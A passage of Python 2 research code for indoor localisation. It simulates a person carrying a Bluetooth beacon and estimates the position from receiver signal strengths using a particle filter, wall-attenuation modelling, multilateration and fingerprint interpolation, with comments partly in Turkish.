self.x_pp = np.zeros((NumberOfParticles, 2)) # prev of prev particle
self.receiverPositions = receiverPositions
self.RSSIofReceivers=[] # what are the RSSI valus for this person on our receiver devices
self.UnprocessedRSSIofReceivers=[] # BLE fingerprinting needs the base value(ham deger) to compare its results with the received(but still weaking due to should be simualated since it is real)
self.distToReceivers=[]
self.prevCovMatrix=None
self.mu=None
self.max_weighted_particle=None
self.slidingWindows=[col_deque([]) for i in range(len(receiverPositions) ) ]
# circle rectangle detection yapmaliyim aslinda:
# http://jeffreythompson.org/collision-detection/circle-rect.php
#ensure person does not go out the map
# movingLimit is the max step lenght of the person, let's say 1 meter per time step for example
# movingTendency is the tendency for our the person to move in a direction
def move_beacon_in_map(self,xdims, ydims,movingLimit,movingTendency=np.array([0,0]),roomBoundary=0 ):
# hepsini dolassin bloklarin, hicbiri ile kesismiyorsa hareket etsin
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
xlow = np.maximum(xmin,self.beacon_pos[0]-movingLimit)-self.beacon_pos[0]
xhigh =np.minimum(xmax, self.beacon_pos[0]+movingLimit)-self.beacon_pos[0]
ylow = np.maximum(ymin,self.beacon_pos[1]-movingLimit)-self.beacon_pos[1]
yhigh =np.minimum(ymax, self.beacon_pos[1]+movingLimit)-self.beacon_pos[1]
while True:
walking_noise_x = np.random.uniform(low=xlow,high=xhigh) # human motion undeterminism
walking_noise_y = np.random.uniform(low=ylow,high=yhigh)
#walking_noise = np.zeros(particles.shape)
walkingNoise=np.array( (walking_noise_x,walking_noise_y)).T
#walkingNoise=np.random.uniform(-movingLimit,movingLimit,size=(2,))
if self.prev_walkingNoise is not None:
walkingChoices=[walkingNoise,self.prev_walkingNoise]
walkingNoise = np.copy(walkingChoices[ np.random.choice([0,1], p=(1-prevMotionRepeatProb,prevMotionRepeatProb)) ] ) # choose the prev motion with a higher probability
tmpBeaconPos=self.beacon_pos + walkingNoise + movingTendency
#print "beacon pos is: " + str(self.beacon_pos)
#print "walkingNoise is: " + str(walkingNoise)
isCollision=not checkIfCoordinateIsInMap(tmpBeaconPos, OOIWidth,OOIHeight)
if not isCollision:
for blockPosition in blockPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
if checkEllipseRectangleIntersection(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength) or \
findRectangleLineSegmentIntersectionPoints(self.beacon_pos,tmpBeaconPos,blockPosition,blockWidth,blockLength) is not None :
isCollision=True
break
if not isCollision:
for roomIndex, roomPosition in enumerate(roomPositions):
#if checkCircleCollision_WithRectangle(tmpBeaconPos,beaconRadius,roomPosition,roomWidth,roomLength):
if checkEllipseRectangleIntersection(tmpBeaconPos,OOIWidth,OOIHeight,roomPosition,roomWidth,roomLength,boundaryForRect=roomBoundary) or \
indRectangleLineSegmentIntersectionPoints(self.beacon_pos,tmpBeaconPos,roomPosition,roomWidth,roomLength) is not None :
isCollision=True
break
if not isCollision:
break
self.prev_walkingNoise=np.copy(walkingNoise)
self.beacon_pos = np.copy(tmpBeaconPos)
def predict_BLE( self, no_of_noise_elements, movingLimit, pastCoeff, xdims, ydims, movingTendency=np.array([0,0]) ):
#rand_gaussian_noise=np.random.multivariate_normal(mu=mu,cov=sigma,size=no_of_noise_elements) # Draw random samples from a multivariate normal distribution
#rand_gaussian_noise = 0
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
# ALL PARTICLES SHOULD RESIDE IN THE MAP, CHECK FOR BEING INSIDE FOR EACH PARTICLE (MOVE THAT AMOUNT AT THE BORDERS AT MAX)
# min of x, should not be lower than map's xmin && max of x should not be larger than map's xmax
# meaning low should be max(xmin,particles[:,0]-xmin-movingLimit) && high = min(xmax, xmax-particles[:,0]+movingLimit)
xlow = np.maximum(xmin,self.particles[:,0]-movingLimit)-self.particles[:,0]
xhigh =np.minimum(xmax, self.particles[:,0]+movingLimit)-self.particles[:,0]
ylow = np.maximum(ymin,self.particles[:,1]-movingLimit)-self.particles[:,1]
yhigh =np.minimum(ymax, self.particles[:,1]+movingLimit)-self.particles[:,1]
walking_noise_x = np.random.uniform(low=xlow,high=xhigh,size=self.particles.shape[0]) # human motion undeterminism
walking_noise_y = np.random.uniform(low=ylow,high=yhigh,size=self.particles.shape[0])
##print "walking_noise_x is: " + str(walking_noise_x)
#walking_noise = np.zeros(particles.shape)
walking_noise_x=np.array(walking_noise_x)
walking_noise_y=np.array(walking_noise_y)
walking_noise=np.array( (walking_noise_x,walking_noise_y)).T
if np.count_nonzero(self.x_prev) != 0 and np.count_nonzero(self.x_pp) != 0:
past_velocity = self.x_prev - self.x_pp
change_in_pos = (1-pastCoeff) * walking_noise + pastCoeff * past_velocity # constant_velocity_motion
else:
change_in_pos = walking_noise
#particles +=
self.particles += change_in_pos + movingTendency
# Update the weight of the particles according to the measured beacon position found in the multilateration algorithm for the current time step
def update_weights(self):
distances = np.linalg.norm(self.particles - self.averaged_beacon_pos, axis=1)
self.weights *= np.sum(distances)/distances
# SET ALL WEIGHTS INTERSECTING WITH AN OBSTRUCTION TO ZERO (so that particles do not accumulate on obstructions)
for particleIndex, particle in enumerate(self.particles):
isCollision=False
for blockPosition in blockPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
if checkEllipseRectangleIntersection(particle,particleWidth,particleHeight,blockPosition,blockWidth,blockLength):
isCollision=True
break
if not isCollision:
for roomIndex,roomPosition in enumerate(roomPositions):
#if checkCircleCollision_WithRectangle(tmpBeaconPos,beaconRadius,roomPosition,roomWidth[roomIndex],roomLength[roomIndex]):
#print "room wall width is: " + str(roomWallWidth)
# use roomWallWidth/2, since linewidth expands toward outside and inside (for roomWallWidth, expands roomWallWidth/2 towards inside and roomWallWidth/2 towards outside)
if checkEllipseRectangleIntersection(particle,particleWidth,particleHeight,roomPosition,roomWidth[roomIndex],roomLength[roomIndex],boundaryForRect=roomWallWidth[roomIndex]/2):
isCollision=True
break
if isCollision:
self.weights[particleIndex]=0
self.weights += 10**(-300) # avoid round-off to zero
self.weights /= sum(self.weights) # normalize
# Resample N_eff
def resample_from_higher_weights(self,tmp_particles, tmp_weights):
#indices = multinomial_resample(weights)
#indices = residual_resample(weights)
#indices = stratified_resample(weights)
indices = systematic_resample(self.weights)
tmp_particles[:] = tmp_particles[indices]
tmp_weights[:] = tmp_weights[indices]
tmp_weights.fill(1.0 / len(tmp_weights))
# maxSignalError in dBm
# it should call checkLineSegmentCollision_WithRectange, to lower signal if receiver and beacon is not in "Line of Sight"
def calc_RSSIs_to_Receivers(self,minSignalValue,minUsefulSignal,maxSignalError):
self.RSSIofReceivers[:] = []
self.UnprocessedRSSIofReceivers[:] = []
receiverIndex=0
for receiverPosition in self.receiverPositions:
res_unprocessedRSSI = 0
if(maxSignalError > 0):
res_unprocessedRSSI=weakenedSignal( distance_to_RSSI( np.linalg.norm(receiverPosition-self.beacon_pos) ) , maxSignalError )
else:
##print "the norm is: " + str(np.linalg.norm(receiverPosition-self.beacon_pos ))
res_unprocessedRSSI=distance_to_RSSI( np.linalg.norm(receiverPosition-self.beacon_pos ) )
#return max(-100,unprocessedRSSI) # Generally signals lower than -100 are not that reliable
isCollision=False
# this is used to weaken the signal in case there was a block or room between the receiver and the beacon(this is real calculation)
# this simulates the signal before we catch it in real life.
weakeningAmount=0 # distance between the receiver and the beacon / 1 meter * ( how many dBm to reduce for 1 meter)
for blockIndex, blockPosition in enumerate(blockPositions):
receiverBeaconBlockIntersection=findRectangleLineSegmentIntersectionPoints(receiverPosition,self.beacon_pos,blockPosition,blockWidth,blockLength)
if receiverBeaconBlockIntersection is not None:
#print "receiverBeaconBlockIntersection" + str(receiverBeaconBlockIntersection)
isCollision=True
weakeningAmount+=np.linalg.norm(receiverBeaconBlockIntersection[0,:]-receiverBeaconBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ] * np.random.uniform(0.5,1.5) # +- some noise olsun
# her engel icin noise eklemek, gercek hayat icin de uygun olacaktir
# aslinda burada duvarin material'i ile de hareket etmeliyim. Coefficient'lar 1m icin idi sonucta
# distance/1 * coefficient , yani distance(in meters) * coefficient olmali
for roomIndex, roomPosition in enumerate(roomPositions):
receiverBeaconRoomIntersection=findRectangleLineSegmentIntersectionPoints(receiverPosition,self.beacon_pos,roomPosition,roomWidth,roomLength)
if receiverBeaconRoomIntersection is not None:
#print "receiverBeaconRoomIntersection" + str(receiverBeaconRoomIntersection)
isCollision=True
weakeningAmount+=np.linalg.norm(receiverBeaconRoomIntersection[0,:]-receiverBeaconRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ] * np.random.uniform(0.5,1.5)
# * some coefficient(odada cok zayiflamasin), odadaki duvarlar kadar zayiflasa yeterli bu da odanin 8'de biri kadar falan olur(kestigimiz 2 duvari da dusunecek olursak)
strengtheningAmount=0 # (distance between the receiver and the mean of the particles) / 1 meter * ( how many dBm to reduce for 1 meter)
# the calculations below are not real. They are our prediction by looking at the mean value of the particles
# if the mean of the prev calculations and the beacons have a block or room in between, we better increase the signal
# this simulates after receiving the signal in real life (post processing of the signal)
isMeanReceiverCollision=False # this is used to strengthen the received signal in case there was a block in between previously
if self.mu is not None: #!= degildir kulanma cunku, array oldugu zaman burasi hata verir
for blockIndex, blockPosition in enumerate(blockPositions):
receiverMeanBlockIntersection = findRectangleLineSegmentIntersectionPoints(receiverPosition,self.mu,blockPosition,blockWidth,blockLength)
if receiverMeanBlockIntersection is not None:
#print "receiverMeanBlockIntersection" + str(receiverMeanBlockIntersection)
isMeanReceiverCollision=True
strengtheningAmount+=np.linalg.norm(receiverMeanBlockIntersection[0,:]-receiverMeanBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ]
for roomIndex, roomPosition in enumerate(roomPositions):
receiverMeanRoomIntersection = findRectangleLineSegmentIntersectionPoints(receiverPosition,self.mu,roomPosition,roomWidth,roomLength)
if receiverMeanRoomIntersection is not None:
#print "receiverMeanRoomIntersection" + str(receiverMeanRoomIntersection)
isMeanReceiverCollision=True
strengtheningAmount+=np.linalg.norm(receiverMeanRoomIntersection[0,:]-receiverMeanRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ]
if isCollision:
##print "No Line Of Sight between receiver " + str(receiverPosition) + " and beacon " + str(self.beacon_pos)
#res_unprocessedRSSI=( weakenedSignal(res_unprocessedRSSI,maxSignalError) + res_unprocessedRSSI ) / 2.0 #weaken a bit, but not weaken upto max signal error
res_unprocessedRSSI-=weakeningAmount
else:
pass
##print "Direct Line Of Sight between receiver " + str(receiverPosition) + " and beacon " + str(self.beacon_pos)
res_processedRSSI=res_unprocessedRSSI
if isMeanReceiverCollision:
res_processedRSSI+=strengtheningAmount
##print "increased signal strength since there was a wall between the receiver and the beacon in the previous step according to our particle calculations"
# ONE MORE CHECK FOR SLIDING WINDOWS #
# each receiver should have a sliding window
# max slidingWindows size should be 7
slidingWindow = self.slidingWindows[receiverIndex]
while len(slidingWindow) >=7:
##print "prev size of the window is: " + str( len(self.slidingWindows) )
slidingWindow.popleft() # delete oldest element
##print "after size of the window is: " + str( len(self.slidingWindows) )
slidingWindow.append(res_processedRSSI) # appends at the right
##print "final size of the window is: " + str( len(self.slidingWindows) )
if self.filterAndCheckSignal(minUsefulSignal,receiverIndex) and res_processedRSSI > minSignalValue:
##print "filtering was successful"
self.RSSIofReceivers.append( res_processedRSSI )
self.UnprocessedRSSIofReceivers.append( res_unprocessedRSSI )
else:
##print "filtering was not successful"
self.RSSIofReceivers.append( None )
self.UnprocessedRSSIofReceivers.append( None )
receiverIndex+=1
def filterAndCheckSignal(self,minUsefulSignal,receiverIndex):
mean=0.0
sum=0.0
slidingWindow = self.slidingWindows[receiverIndex]
if len(slidingWindow) < 3:
return False
else:
noOutlierDeque=col_deque(sorted(slidingWindow) )
noOutlierDeque.popleft() # delete smallest
noOutlierDeque.pop() # delete greatest
for signalVal in noOutlierDeque:
sum+=signalVal
mean=sum/len(noOutlierDeque)
return mean >= minUsefulSignal
# if RSSI is lower than -90dBm , then omit this receiver ( assuming we use 0dBm signal powered beacons)
def setBeaconDistances_fromRSSIs(self,minUsefulSignal):
self.distToReceivers[:] = []
for RSSIofReceiver in self.RSSIofReceivers:
#print "rssi of receiver is: " + str(RSSIofReceiver)
if RSSIofReceiver is not None and \
RSSIofReceiver > minUsefulSignal:
self.distToReceivers.append( RSSI_to_distance( RSSIofReceiver ) + safetyOffset ) # add safetyOffset0 to avoid divide by zero in the custom_minimize function
else:
self.distToReceivers.append( None )
# NumberOfParticles for 4 RECEIVER
def multiLateration(self,xdims,ydims,sensitivityOfResult):
receiverPositionsArray=np.array(self.receiverPositions)
# if checkForBlocks == True, it also considers blocks for minimization in the disadvantage of time consumption
# checkForBlocks means include None info to make multi lateration calculations
resultingPoint = custom_minimize(self.RSSIofReceivers,np.vstack(receiverPositionsArray ),xdims,ydims,sensitivityOfResult,checkForBlocks=True )
return resultingPoint
def calc_PDF(self,strongSignalDistance,pastCoeff):
numberOfNotNones=0
numberOfStrongSignals=0
confidenceEllipseMultiplier=1
for distToReceiver in self.distToReceivers:
if distToReceiver is not None:
numberOfNotNones+=1
#print "dist to receiver is: " + str(distToReceiver)
if distToReceiver < strongSignalDistance:
numberOfStrongSignals+=1
"""returns mu and variance of the weighted particles"""
self.mu = np.average(self.particles, weights=self.weights, axis=0)
#var = np.average((particles - mu)**2, weights=weights, axis=0)
self.covMatrix = np.cov(m=self.particles, rowvar=False, aweights=self.weights) # rowvar has to be False otherwise each row represents a variable, with observations in the columns.
# https://docs.scipy.org/doc/numpy-1.15.0/reference/generated/numpy.cov.html
self.max_weighted_particle = self.particles[np.argmax(self.weights) ]
if numberOfNotNones >=3:
if numberOfStrongSignals >= 3:
confidenceEllipseMultiplier=1 # No change
elif numberOfStrongSignals == 2:
confidenceEllipseMultiplier=1.25
elif numberOfStrongSignals == 1:
confidenceEllipseMultiplier=1.5
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=2
# x1.6 worse than the >=3 case
elif numberOfNotNones == 2:
if numberOfStrongSignals == 2:
confidenceEllipseMultiplier=2
elif numberOfStrongSignals == 1:
confidenceEllipseMultiplier=2.4
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=3.2
# x3 worse than the >=3 case
elif numberOfNotNones == 1:
if numberOfStrongSignals == 1:
confidenceEllipseMultiplier=4.5
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=6.0
# x5 worse than the >=3 case
else: # numberOfNotNones == 0:
#confidenceEllipseMultiplier=float("inf") # boyle olunca hic cizmesin ellipse
confidenceEllipseMultiplier=10.0 # 10.0 max'imiz olsun mesela
self.covMatrix*=confidenceEllipseMultiplier
# if pastCoeff == 1, o zaman ilk tur harici covMatrix hep prev'e esit olacak. Yani ilk turda buldugu covariance hep esas algidi olmus olacak
if self.prevCovMatrix is not None:
self.covMatrix=self.covMatrix*(1-pastCoeff) + pastCoeff*self.prevCovMatrix
# circle center, circle radius, 2 ends of line segment
def findEllipseLineSegmentIntersectionPoints(ellipseCenter,width,height, p1,p2):
if ( np.array_equal(p1,p2) ):
return None
centerPoint = Point(ellipseCenter)
unitCircle = centerPoint.buffer(1).boundary
ellipse=shapely.affinity.scale(unitCircle,width,height)
line = LineString([p1,p2])
if ellipse.intersects(line):
intersectionPointObject = ellipse.intersection(line)
intersectionPoint=np.array([intersectionPointObject.coords[0],intersectionPointObject.coords[1]])
else:
intersectionPoint=None
return intersectionPoint
def checkFirstRectangleContainsSecondRectangle(rectCenter,rectWidth,rectLength, rectCenter2,rectWidth2,rectLength2,boundaryForFirstRect=0,boundaryForSecondRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect),-(rectLength/2 + boundaryForFirstRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect) ,rectLength/2 + boundaryForFirstRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,-(rectLength/2 + boundaryForFirstRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,rectLength/2 + boundaryForFirstRect])
bottomLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect),-(rectLength2/2 + boundaryForSecondRect) ])
topLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect) ,rectLength2/2 + boundaryForSecondRect])
bottomRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,-(rectLength2/2 + boundaryForSecondRect) ])
topRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,rectLength2/2 + boundaryForSecondRect])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
rectangle2 = Polygon([bottomLeftCorner2, topLeftCorner2, topRightCorner2, bottomRightCorner2])
return rectangle.contains(rectangle2)
def checkRectangleRectangleIntersection(rectCenter,rectWidth,rectLength, rectCenter2,rectWidth2,rectLength2,boundaryForFirstRect=0,boundaryForSecondRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect),-(rectLength/2 + boundaryForFirstRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect) ,rectLength/2 + boundaryForFirstRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,-(rectLength/2 + boundaryForFirstRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,rectLength/2 + boundaryForFirstRect])
bottomLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect),-(rectLength2/2 + boundaryForSecondRect) ])
topLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect) ,rectLength2/2 + boundaryForSecondRect])
bottomRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,-(rectLength2/2 + boundaryForSecondRect) ])
topRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,rectLength2/2 + boundaryForSecondRect])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
rectangle2 = Polygon([bottomLeftCorner2, topLeftCorner2, topRightCorner2, bottomRightCorner2])
return rectangle.intersects(rectangle2)
# circle center, circle radius, 2 ends of line segment
def checkEllipseRectangleIntersection(ellipseCenter,width,height, rectCenter,rectWidth,rectLength,boundaryForRect=0):
# CORNERS
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
centerPoint = Point(ellipseCenter)
unitCircle = centerPoint.buffer(1).boundary
ellipse=shapely.affinity.scale(unitCircle,width,height)
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
return ellipse.intersects(rectangle)
def checkPointInsideRectangle(point,rectCenter,rectWidth,rectLength,boundaryForRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
point = Point(point)
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
return point.intersects(rectangle)
def findRectangleLineSegmentIntersectionPoints(p1,p2,rectCenter,rectWidth,rectLength,boundaryForRect=0):
# CORNERS
if np.array_equal(p1,p2):
return None
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
line = LineString([p1,p2])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
#print "findRectangleLineSegmentIntersectionPoints"
if rectangle.intersects(line):
intersectionPointObject = rectangle.intersection(line)
#print intersectionPointObject.coords[0]
#print intersectionPointObject.coords[1]
#print np.array(intersectionPointObject.coords).shape
if np.array_equal(np.array(intersectionPointObject.coords).shape,np.array([2, 2])):
intersectionPoint=np.array([intersectionPointObject.coords[0],intersectionPointObject.coords[1]])
else:
intersectionPoint=None
#print "rectangle line intersection is: " + str(intersectionPoint)
#intersectionPoint=np.asarray(intersectionResult.geoms[0].coords[0],intersectionResult.geoms[1].coords[0])
else:
intersectionPoint=None
return intersectionPoint
def generateRandomMACID():
return ':'.join('%02x'%np.random.randint(0,256) for _ in range(6))
# zayiflamasina ragmen bir istasyona gelen sinyal guclu ise, bu sinyal diger zayif sinyallerden daha degerli
# bu yukaridazden distToReceivers degeri kucuk olan bir sinyal bizim icin daha cok anlama ifade ediyor
# bu degeri kucuk olan istedigimiz icin bu deger ile carparsam o sum daha kucuk olur, bizim istedigimizi elde ihtimalimiz artar
# multilateratiion icin check edecegimiz [x,y] noktasi, eger ble fingerprinting result'taki ile +-2dBm'den fark ediyorsa cezalandir. Bu noktalarin olma ihtimali daha az cunku
def custom_minimize(RSSIofReceivers, receiverPositions,xdims,ydims,sensitivityOfResult=1.0,checkForBlocks=True):
mysum=float("inf")
maxCatchableSignalDistance = RSSI_to_distance( minUsefulSignal ) + safetyOffset
#print "maxCatchableSignalDistance is: " + str(maxCatchableSignalDistance)
resultingPoint=[-1,-1]
for x in np.arange(xdims[0],xdims[1],sensitivityOfResult):
for y in np.arange(ydims[0],ydims[1],sensitivityOfResult):
# if x,y collides with a block or room, this position would not be possible
isPointOnObstacle=False
for blockPosition in blockPositions: # it will not enter this loop if there are no blocks
if checkPointInsideRectangle([x,y],blockPosition,blockWidth,blockLength):
isPointOnObstacle=True
break
if not isPointOnObstacle:
for roomIndex,roomPosition in enumerate(roomPositions):
if checkPointInsideRectangle([x,y],roomPosition,roomWidth[roomIndex],roomLength[roomIndex]):
isPointOnObstacle=True
break
if isPointOnObstacle:
continue # this point cannot be what we are looking for
tmp_sum=0
for i in range(len(receiverPositions)):
strengtheningAmount=0
for blockIndex, blockPosition in enumerate(blockPositions): # it will not enter this loop if there are no blocks
receiverMeanBlockIntersection = findRectangleLineSegmentIntersectionPoints(receiverPositions[i],np.array([x,y]),blockPosition,blockWidth,blockLength)
if receiverMeanBlockIntersection is not None:
#print "receiverMeanBlockIntersection" + str(receiverMeanBlockIntersection)
strengtheningAmount+=np.linalg.norm(receiverMeanBlockIntersection[0,:]-receiverMeanBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ]
for roomIndex, roomPosition in enumerate(roomPositions):
# when tryin all possible x and y, this x and y should not be equal to the receivers position, since it would not be a line
# if it is equal to the receivers position, the intersection should return None
# so findRectangleLineSegmentIntersectionPoints function should return None if points to make the lines are equal
# also if intersection is at a corner(which means intersect only at 1 point, then it should return None for this case as well since intersection dist would be zero already)
receiverMeanRoomIntersection = findRectangleLineSegmentIntersectionPoints(receiverPositions[i],np.array([x,y]),roomPosition,roomWidth[roomIndex],roomLength[roomIndex])
if receiverMeanRoomIntersection is not None:
#print "receiverMeanRoomIntersection" + str(receiverMeanRoomIntersection)
strengtheningAmount+=np.linalg.norm(receiverMeanRoomIntersection[0,:]-receiverMeanRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ]
xyDistToRec = np.linalg.norm( [x,y] - receiverPositions[i] )
if RSSIofReceivers[i] is not None:
distToReceiverGivenRSSI=RSSI_to_distance( RSSIofReceivers[i] + strengtheningAmount) + safetyOffset
tmp_sum+=( abs( xyDistToRec - distToReceiverGivenRSSI ) / distToReceiverGivenRSSI ) ** 2
# eger 5 turdur arka arkaya None ise yapsin hemen None ise degil -> zaten sinyalleri buraya gondermeden ona gore ayarliyorum
else: # distToReceivers[i] None ise, [x,y]'intersection receiver'imiza belli yakinliktan fazla yakin olmasi imkansiz olmali(bundan daha yakin ise cezalandir)
# [x,y], receiverPositions[i]'ye ne kadar yakinda o kadar cezalandir
# distToReceivers[i] bizim belirledigimiz bir sey zaten tahminimiz yani. Biz bunun yerine mesela 10m koyabiliriz bundan ne kdar deviate etmis diye
# ama bizim icin ne kadar yakinda o kadar kotu cunku biz belirli bir uzaklik tahmin ediyoruz, o yuzden 1/distToReceivers yerine 1/ ( [x,y]-receiverPositons) koyalim
#if checkForBlocks:
maxCatchableSignalDistance = RSSI_to_distance( minUsefulSignal + strengtheningAmount) + safetyOffset
if xyDistToRec < maxCatchableSignalDistance: # we see it as None, so it should not be closer than maxCatchableSignalDistance. If so, then punish
tmp_sum+=( abs( xyDistToRec - maxCatchableSignalDistance ) / xyDistToRec ) ** 2
if tmp_sum < mysum:
mysum = tmp_sum
resultingPoint=[x,y]
return resultingPoint
# after signal transmitted, maybe the signal hit a wall and reduced in strength/
# since we cannot manipulate after transmittion is node, we reduce the signal when transmitting assuming it will hit something by a posibility
# We have to increase it by a possibility
def weakenedSignal(RSSI,maxSignalError):
return RSSI - uniform(0,maxSignalError)
def create_uniform_particles(x_range, y_range, NumberOfParticles):
particles = np.empty((NumberOfParticles, 2))
particles[:, 0] = uniform(x_range[0], x_range[1], size=NumberOfParticles)
particles[:, 1] = uniform(y_range[0], y_range[1], size=NumberOfParticles)
return particles
# for each receiver hold a separate signal strenght map
# each beacon should have its interpolation all around the map. Then we we should take weighted average of these beacons signal strengths values
# For example, FOR RECEIVER 1, if beacon1 is at [5,5] and beacon2 is at [10,3] and the point that we want to interpolate is at [10,5]. Beacon2 should have higher vote to determine signal strength
# signal strength values of the beacons (fingerpritn positions) are different for each receiver, therefore for each receiver we should hold another map info
def interpolateFingerPrintingResult():
xElems=np.arange(xdims[0],xdims[1],sensitivityOfResult)
yElems=np.arange(ydims[0],ydims[1],sensitivityOfResult )
allPosDistancesToReceivers={} # make it a dictionary where the key is 2d position
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
allPosDistancesToReceivers[i,x,y]=np.linalg.norm(receiverPositions[i]- [x,y])
numberOfBeacons=fingerPrintingSignalStrengthBeaconsToReceivers.shape[1]
allPosDistancesToBeacons={} # make it a dictionary where the key is 2d position
for k in range(numberOfBeacons):
for x in xElems:
for y in yElems:
allPosDistancesToBeacons[k,x,y]=np.linalg.norm(fingerPrintingBeaconPositions[k]- [x,y])
# INITIALIZE INTERPOLATION MAP FOR EACH RECEIVER
global interpolatedSignalStrenghForAllPositions_forEachReceiver
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y]=0
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
minDist=np.float('inf')
min_k=0
# find the closest beacon to [x,y]
for k in range(numberOfBeacons):
if allPosDistancesToBeacons[k,x,y] < minDist:
min_k=k
minDist = allPosDistancesToBeacons[k,x,y]
base_dist=np.linalg.norm(fingerPrintingBeaconPositions[min_k]-receiverPositions[i])
target_dist=allPosDistancesToReceivers[i,x,y]
base_RSSI=fingerPrintingSignalStrengthBeaconsToReceivers[i][min_k]
# whichever beacon or receiver is the closest to [x,y], it should determine the interpolation result
interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y]+=calc_relative_RSSI(base_dist,target_dist,base_RSSI)
print calc_relative_RSSI(base_dist,target_dist,base_RSSI)
print interpolatedSignalStrenghForAllPositions_forEachReceiver
def calc_relative_RSSI(base_dist, target_dist, base_RSSI):
if target_dist >= 1:
return base_RSSI + -20 * np.log ( (target_dist) / (base_dist+safetyOffset) )
else:
return zero_one_meter_distance_to_RSSI(target_dist)
#distance in meters, returns RSSI in dBm
# assuming signal propogation constant is 2, https://www.rn.inf.tu-dresden.de/dargie/papers/icwcuca.pdf in equation (4)
# distance 4'den 8'e cikinca 0.6'dan 0.9'a cikiyor(negative ile carpildigi icin output), output daha az azalmis oluyro dist arttikca
# zero_one_meter_distance_to_RSSI'te ise mesela dist 0.1'den 0.2'ye ciksa sonuc 0.15'en 0.34'e cikiyor -> yani rssi daha hizli azalmis oluyor
def distance_to_RSSI(distance):
res_RSSI = 0
##print "distance is: " + str(distance)
if distance >=1:
res_RSSI = -20 * np.log10(distance) + rssiAtOne
else:
res_RSSI = zero_one_meter_distance_to_RSSI(distance)
return float(res_RSSI)
#RSSI in dBm, returns distance in meter
def RSSI_to_distance(RSSI):
res_distance = 0
if RSSI <= rssiAtOne:
res_distance = 10**( (RSSI-rssiAtOne) / -20 )
else:
res_distance = zero_one_meter_RSSI_to_distance(RSSI)
return float(res_distance)
# EXPONENTIAL FUNCITON BETWEEN 0 and 1
def zero_one_meter_RSSI_to_distance(RSSI):
return 10**( ( ( RSSI - TX_Power ) * np.log10(2) ) / (rssiAtOne - TX_Power) ) -1
# should return something between TX power and rssiAtOne
def zero_one_meter_distance_to_RSSI (dist):
